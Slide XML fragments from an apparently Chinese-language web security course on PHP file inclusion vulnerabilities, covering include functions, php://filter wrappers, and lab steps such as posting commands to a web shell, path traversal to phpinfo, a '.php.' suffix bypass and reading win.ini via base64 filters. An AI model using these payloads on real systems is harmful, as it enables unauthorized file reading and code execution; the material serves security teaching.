        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="文本框 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6753860" y="5915025"/>
            <a:ext cx="4064000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>打开对应</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>网址，发现没有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>内容</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>木马</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800860" y="1174750"/>
            <a:ext cx="8313420" cy="3017520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1785620" y="4439285"/>
            <a:ext cx="4064000" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>hacker bar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>post</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>中传入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>echo “H</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ello World!”;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1800860" y="5413375"/>
            <a:ext cx="8286750" cy="1379220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>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LFI-7</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92760" y="1720215"/>
            <a:ext cx="11353165" cy="3778250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="497840" y="6064885"/>
            <a:ext cx="4064000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>../../phpinfo</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="593090" y="5570220"/>
            <a:ext cx="8131175" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>原理是一样的，只不过这里</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>library</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>用的是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>post</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>方法传</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>参数的</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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LFI-8</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09575" y="1296670"/>
            <a:ext cx="10953750" cy="4521835"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="518795" y="6114415"/>
            <a:ext cx="6538595" cy="583565"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>可以变成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200"/>
              <a:t>.php.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800"/>
              <a:t>绕过，只不过用了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800"/>
              <a:t>post</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800"/>
              <a:t>传参数</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800"/>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filiter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>伪协议</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1080770" y="2816225"/>
            <a:ext cx="2813685" cy="1938020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>文件包函数：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>include();</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>include_once();</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>require();</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>require_once();</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4411345" y="2816225"/>
            <a:ext cx="4064000" cy="1938020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>文件操作类</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>函数：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>fopen();</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>file();</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>readfile();</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>file_get_contents();</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>......</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1080770" y="5138420"/>
            <a:ext cx="10175875" cy="1568450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>php://filter</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>php://filter 是一种元封装器，设计用于数据流打开时的筛选过滤应用</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>属性设置中，无论allow_url_fopen，allow_url_include是否开启都可以使用</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="文本框 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1080770" y="1318895"/>
            <a:ext cx="9997440" cy="706755"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>可以作为一个中间流来过滤其他的数据流。通常使用该协议来读取或者写入部分数据，且在读取和写入之前对数据进行一些过滤，例如base64编码处理，rot13处理等</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>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伪协议用法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9" name="文本框 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="998855" y="1857375"/>
            <a:ext cx="9996805" cy="398780"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>php://filter/read=convert.base64-encode/resource=c:/windows/win.ini</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1004570" y="2356485"/>
            <a:ext cx="10761345" cy="955675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>read是要执行的操作</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>convert.base64-encode的意思是读出的内容经过一次base64编码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>resource后面跟的是读取内容的路径</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="374650" y="3716020"/>
            <a:ext cx="11442065" cy="2827655"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1004570" y="1489075"/>
            <a:ext cx="8176260" cy="398780"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>php://filter/过滤器|过滤器/resource=要过滤的数据流</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>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伪协议用法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0" y="2435225"/>
            <a:ext cx="13161645" cy="1198880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>echo file_get_contents</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>("php://filter/read=convert.base64-encode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>|</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>convert.base64-encode/resource=data://text/plain,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;?php phpinfo();?&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>");</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>data://text/plain 是一种 PHP 数据流，允许您在 PHP 脚本中直接嵌入数据</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-13970" y="4446905"/>
            <a:ext cx="9918065" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>上述代码对 &lt;?php phpinfo();?&gt; 进行了两次base64编码处理。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>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伪协议用法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7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="1332230"/>
            <a:ext cx="7427595" cy="1476375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>php://filter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>协议的过滤器大致分为以下四类：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、字符串过滤器</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、转换过滤器</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、压缩过滤器</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、加密过滤器</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="3126105"/>
            <a:ext cx="10575290" cy="1205230"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPct val="60000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1"/>
              <a:t>filter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>字符串过滤器</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>每个过滤器都正如其名字暗示的那样工作并与内置的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>字符串函数的行为相对应。字符串过滤器以 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>开头，常见的过滤器有 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rot13</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>toupper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tolower</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>等</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="337820" y="4749800"/>
            <a:ext cx="11666855" cy="1661795"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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标题 5"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>文件包含</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="651510" y="1896110"/>
            <a:ext cx="10888345" cy="2553335"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>文件包含（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>File Inclusion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>）是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>开发中一种加载和执行文件的机制，通常用于将外部文件的内容包含到当前文件中。文件包含的作用是使代码更模块化、可重用，避免重复编写相同的功能。在许多编程语言（如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>Python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>等）中，文件包含是实现代码共享和组织代码结构的常用方法。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>开发中，文件包含常见于以下情况：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>模板文件：动态加载HTML页面的不同部分（如头部、导航栏、底部）。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>配置文件：包含数据库连接配置或其他系统设置。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>函数库或模块：加载实现某些特定功能的文件。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="694690" y="1180783"/>
            <a:ext cx="5080000" cy="645160"/>
          </a:xfrm>
